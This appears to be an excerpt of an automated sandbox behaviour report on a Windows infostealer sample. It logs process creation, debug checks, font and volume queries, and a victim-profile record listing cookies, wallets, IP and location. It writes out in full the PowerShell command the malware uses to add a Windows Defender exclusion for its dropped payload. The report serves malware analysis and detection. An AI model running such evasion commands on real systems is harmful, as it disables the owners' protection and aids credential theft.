                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess token adjusted: Debug
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess token adjusted: Debug
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E4F838
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4F9D5 SetUnhandledExceptionFilter,0_2_00E4F9D5
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00E4FBCA
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E58EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E58EBD
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeMemory allocated: page read and write | page guardJump to behavior

                                  HIPS / PFW / Operating System Protection Evasion

                                  barindex
                                  Adds a directory exclusion to Windows Defender
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe'
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe'Jump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\MsContainer\P69CZ8d7qXWcyOsB66pHSLt72y6yplqEAs.vbe" Jump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\MsContainer\GHGhSTUsO1Bq4f5yX2eWVB.bat" "Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\MsContainer\chainportruntimeCrtMonitor.exe "C:\MsContainer/chainportruntimeCrtMonitor.exe"Jump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe'Jump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\hlVW2PE0oG.bat" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe "C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe" Jump to behavior
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.000000000370E000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003837000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerH
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.000000000370E000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003790000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003529000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003837000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Has Crypto Wallets (fff5)":"N","Crypto Extensions (fff5)":"N","Crypto Clients (fff5)":"N","Cookies Count (1671)":"25","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?","Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N"},"5.0.4",5,1,"","user","045012","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Users\\user\\AppData\\Local\\Temp","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.228","US / United States","New York / New York","40.7123 / -74.0068"]
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Has Crypto Wallets (fff5)":"N","Crypto Extensions (fff5)":"N","Crypto Clients (fff5)":"N","Cookies Count (1671)":"25","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?","Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N"},"5.0.4",5,1,"","user","045012","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Users\\user\\AppData\\Local\\Temp","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.228","US / United States","New York / New York","p
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.000000000370E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Has Crypto Wallets (fff5)":"N","Crypto Extensions (fff5)":"N","Crypto Clients (fff5)":"N","Cookies Count (1671)":"25","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?","Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N"},"5.0.4",5,1,"","user","045012","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Users\\user\\AppData\\Local\\Temp","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.228","US / United States","New York / New York","40.7123 / -74.0068"](
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4F654 cpuid 0_2_00E4F654
                                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00E4AF0F
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeQueries volume information: C:\MsContainer\chainportruntimeCrtMonitor.exe VolumeInformationJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
